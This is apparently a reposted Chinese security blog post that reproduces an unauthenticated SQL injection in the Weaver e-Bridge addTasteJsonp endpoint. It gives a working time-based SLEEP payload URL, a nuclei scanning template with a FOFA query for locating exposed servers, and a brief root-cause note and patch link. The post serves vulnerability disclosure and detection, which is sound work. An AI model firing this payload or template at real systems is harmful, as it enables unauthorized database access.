漏洞介绍
泛微云桥e-Bridge是在"互联网+”"的背景下研发的一款用于桥接互联网开放资源与企业信息化系统的 系统集成Q平台。它旨在解决企业信息化建设中面临的系统对接复杂、信息孤岛等问题,通过提供高效、便捷的系统集成解决方案,帮助企业实现 业务流程只的优化和升级。该产品支持将企业内部系统的消息推送到用户的移动设备上,使得用户能够随时随地接收和处理工作信息,提高了工作的及时性和响应速度。泛微-云桥e-Bridge addTasteJsonp 接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息。
漏洞复现
POC:
(这微信页面直接复制代码格式会乱,可以浏览器打开复制)
/taste/addTasteJsonp?company=1&userName=1&jsonpcallback=1&mobile=1%27%20AND%20(SELECT%208094%20FROM%20(SELECT(SLEEP(6)))mKjk)%20OR%20%27KQZm%27=%27REcX
漏洞分析
环境搭建
https://wxdownload.e-cology.com.cn/ebridge/ebridge_install_win64_server2008R2_20200819.zip
打补丁
https://wxdownload.e-cology.com.cn/ebridge/ebridge_patch_20230724.zip
解压文件,得到一个“ROOT”文件夹,直接覆盖到自己泛微云桥目录即可
漏洞文件路径:ebridgetomcatwebappsROOTWEB-INFclassesweaverweixintastecontrollerTasteController.class
通过GET方法获取参数值,带入到 saveTaste
函数查询
在saveTaste
函数sql语句中直接拼接了 mobile 字符串的值导致漏洞产生。
nuclei脚本
id: fanwei-e-Bridge-addTasteJsonp-sqli
info:
name: fanwei-e-Bridge-addTasteJsonp-sqli
author: PokerSec
severity: critical
metadata:
fofa-search: app="泛微云桥e-Bridge"
http:
- raw:
- |
GET /taste/addTasteJsonp?company=1&userName=1&jsonpcallback=1&mobile=1%27%20AND%20(SELECT%208094%20FROM%20(SELECT(SLEEP(3)))mKjk)%20OR%20%27KQZm%27=%27REcX HTTP/1.1
Host: {{Hostname}}
- |
GET /taste/addTasteJsonp?company=1&userName=1&jsonpcallback=1&mobile=1%27%20AND%20(SELECT%208094%20FROM%20(SELECT(SLEEP(6)))mKjk)%20OR%20%27KQZm%27=%27REcX HTTP/1.1
matchers:
- type: dsl
condition: and
dsl:
- "status_code == 200 && duration_1>=3 && duration_1<=6 && duration_2>=6 && duration_2<=9"
extractors:
- type: dsl
dsl:
- duration_2
修复意见
官方已更新最新补丁,请及时更新https://www.weaver.com.cn/
如有侵权,请及时联系删除。
原文始发于微信公众号(PokerSec):【漏洞复现】泛微-云桥e-Bridge addTasteJsonp 接口存在SQL注入漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论